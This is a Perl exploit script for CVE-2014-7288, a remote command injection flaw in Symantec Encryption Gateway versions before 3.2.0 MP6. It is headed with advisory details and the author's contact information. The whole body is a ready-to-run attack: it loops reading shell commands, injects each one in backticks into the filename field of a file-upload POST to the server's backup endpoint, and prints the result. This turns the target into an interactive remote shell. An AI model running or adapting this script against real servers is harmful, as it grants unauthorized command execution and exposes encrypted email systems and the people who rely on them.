Symantec Encryption Gateway Remote Command Injection

`#!/usr/bin/perl -w  
  
use LWP::UserAgent;  
  
# Vantage Point Security Advisory 2014-007  
# Title: Symantec Encryption Management Server - Remote Command   
Injection Exploit  
# CVE: CVE-2014-7288  
# Vendor: Symantec  
# Affected Product: Symantec Encryption Gateway  
# Affected Versions: < 3.2.0 MP6  
# Product Website:   
http://www.symantec.com/en/sg/gateway-email-encryption/  
# Exploit Info : https://www.exploit-db.com/exploits/35949/  
# Author: Mohammad Reza Espargham  
# Linkedin : https://ir.linkedin.com/in/rezasp  
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com  
# Website : www.reza.es  
# Twitter : https://twitter.com/rezesp  
# FaceBook : https://www.facebook.com/mohammadreza.espargham  
  
if (($#ARGV + 1) != 1)  
{  
printf " Usage: \n \t$0 <Target>\n";  
printf "\t$0 http://target.com/\n\n";  
exit(1);  
}  
  
chomp($target=$ARGV[0]);  
  
if($target !~ /http:\/\//) { $target = "http://$target"; }  
  
my $ua = LWP::UserAgent->new;  
$ua->timeout(10);  
my $url = "$target/omc/uploadBackup.event";  
  
for(;;)  
{  
print "shell : ";  
chomp($cmd=<STDIN>);  
my $response = $ua->post( $url,  
Content_Type => 'form-data',  
name => "file",  
Content => [ filename => "test123|`$cmd`|-whatever.tar.gz.pgp" ]  
);  
print "\n".$response->content;  
}  
`